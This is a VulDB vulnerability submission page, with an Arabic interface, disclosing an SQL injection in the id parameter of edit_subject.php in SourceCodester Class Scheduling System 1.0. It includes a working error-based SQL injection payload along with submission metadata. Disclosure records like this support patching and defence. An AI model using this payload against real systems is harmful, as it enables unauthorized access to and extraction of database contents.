إرسال #158702: Class Scheduling System v1.0 /online_class_scheduling_system/admin/edit_subject.php GET parameters has SQL injectionالمعلومات

عنوانClass Scheduling System v1.0 /online_class_scheduling_system/admin/edit_subject.php GET parameters has SQL injection
الوصفClass Scheduling System v1.0 has SQL injection. Vulnerability File: /online_class_scheduling_system/admin/edit_subject.php Vulnerability location: /online_class_scheduling_system/admin/edit_subject.php?id Payload: id=23' and (select 1 from(select count(*),concat(0x71727374,(select (elt(333=333,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)x) and 'b'='b Error-based SQL injection is successful, proving the existence of SQL injection vulnerabilities.
المصدر⚠️ https://github.com/zhulielie/CVEReport/blob/main/SQL.md
المستخدم
 zhulielie (UID 46781)
ارسال20/05/2023 03:41 AM (3 سنوات منذ)
الاعتدال20/05/2023 08:49 AM (5 hours later)
الحالةتمت الموافقة
إدخال VulDB229597 [SourceCodester Class Scheduling System 1.0 GET Parameter /admin/edit_subject.php معرف حقن SQL]
النقاط20

التالي نظرة عامة السابق

Do you want to use VulDB in your project?

Use the official API to access entries easily!